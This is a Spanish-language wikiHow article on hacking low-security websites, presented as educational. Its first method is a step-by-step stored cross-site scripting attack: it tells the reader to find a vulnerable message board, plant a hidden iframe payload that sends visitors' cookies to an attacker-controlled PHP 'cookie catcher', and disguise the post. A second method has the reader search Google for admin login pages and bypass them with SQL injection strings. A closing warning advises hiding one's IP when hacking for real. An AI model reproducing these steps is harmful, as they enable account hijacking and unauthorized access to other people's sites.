X
wikiHow es un "wiki", lo que significa que muchos de nuestros artículos están escritos por varios autores. Para crear este artículo, 28 personas, algunas anónimas, han trabajado para editarlo y mejorarlo con el tiempo.
Este artículo ha sido visto 141 783 veces.
Nota: el presente artículo está creado estrictamente con fines educativos, ya sea para ayudar a las personas a aprender a convertirse en un hacker de sombrero blanco o bien para demostrar cómo deben trabajar los hackers para proteger mejor sus sitios web. El presente tutorial te facilitará los pasos para obtener acceso a muchos sitios web de baja seguridad.
Pasos
Método 1
Método 1 de 3:Con Cross Site Scripting
Método 1
-
1Busca un sitio vulnerable donde puedas publicar contenido. Un tablón de anuncios es un buen ejemplo. Recuerda, si el sitio es seguro, esto no funcionará.
-
2Crea una publicación. Necesitarás introducir un código especial en la "publicación" que capturará los datos de todos los que hagan clic en ella.
- Intenta averiguar si los filtros del sistema filtran el código externo. Publica <script...>alert("test")</...script> (eliminando los "…"). Si un cuadro de alerta aparece cuando haces clic en la publicación, entonces el sitio es vulnerable a ataques.
-
3Crea y sube tu capturador de cookies. El objetivo de este ataque es capturar las cookies de los usuarios, que te permitirán acceder a sus cuentas en sitios webs que tengan inicios de sesión vulnerables. Necesitarás un capturador de cookies que capturará las cookies de tu objetivo y las redirigirá. Sube el capturador a un sitio web al cual tengas acceso y que soporte php. Más adelante te daremos un ejemplo de código de capturador de cookies.
-
4Haz una publicación con tu capturador de cookies. Ingresa un código apropiado en la publicación para capturar las cookies y enviarlas a tu sitio. Te recomendamos poner algún texto luego del código para reducir las sospechas y evitar que tu publicación sea eliminada.
- Un código de ejemplo sería: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location="YOURURL/cookiecatcher.php?c="+document.cookie)><.../iframe> (eliminando los "…").
-
5Utiliza las cookies que recolectaste. Luego, podrás utilizar la información de las cookies, que ya estarán guardadas en tu sitio web con el propósito que necesites.
Método 2
Método 2 de 3:Ejecuta ataques de inyección
Método 2
-
1Busca un sitio vulnerable. Necesitarás encontrar un sitio que sea vulnerable por tener un inicio de sesión del administrador al que pueda accederse fácilmente. Intenta buscar en Google admin login.asp.
-
2Inicia sesión como administrador. Escribe "admin" como nombre de usuario y utiliza alguna de las distintas cadenas de caracteres como contraseña. Estas pueden ser alguna de las diferentes cadenas pero un ejemplo común sería 1’o’1’=’1.
-
3Ten paciencia. Esto podría requerir varias pruebas y errores.
-
4Accede el sitio web. Al final, se supone que encontrarás un hilo que te dé acceso de administrador a algún sitio web, si este es vulnerable a ataques.
Método 3
Método 3 de 3:Prepárate para tener éxito
Método 3
-
1Aprende uno o dos lenguajes de programación. Si realmente quieres aprender a hackear sitios web, necesitarás comprender cómo funcionan las computadoras y otras tecnologías. Aprende a utilizar lenguajes de programación tales como Python o SQL, de forma tal que puedas adquirir un mayor control sobre las computadoras e identificar vulnerabilidades en los sistemas.
-
2Aprende HTML básico. También necesitarás tener una amplia comprensión de html y javascript si pretendes hackear sitios web en particular. Aprenderlo puede llevar algún tiempo, pero existen muchas formas gratuitas de aprender por Internet, así que seguramente tendrás la oportunidad si quieres aprovecharla.
-
3Consulta con hackers de sombrero blanco. Los hackers de sombrero blanco son hackers que utilizan sus potencialidades para el bien, al exponer vulnerabilidades en la seguridad y al hacer de Internet un mejor lugar para todos. Si tienes ganas de aprender a hackear y utilizar tus habilidades para el bien o si quieres proteger tu propio sitio web, te recomendamos contactarte con algún hacker de sombrero blanco para pedirle sus consejos.
-
4Investiga sobre el tema. Si tienes ganas de aprender a hackear o simplemente quieres protegerte, necesitarás investigar mucho sobre el tema. Existen demasiadas formas en las cuales un sitio web puede ser vulnerable y la lista cambia constantemente, así que deberás seguir aprendiendo en forma permanente.
-
5Mantente al día. Ya que la lista de posibles ataques cambia constantemente, necesitarás asegurarte de estar siempre al día. ¡El hecho de que puedas protegerte de algún tipo de ataque, no significa que estarás a salvo en el futuro!
Consejos
- Visita foros de hackers para obtener consejos útiles.
Advertencias
- Si vas a hackear en el mundo real, oculta tu IP utilizando software disponible en línea.
- Leer nuestro artículo no te convertirá inmediatamente en un hacker. Deberás explorar tus habilidades y practicar sin cesar.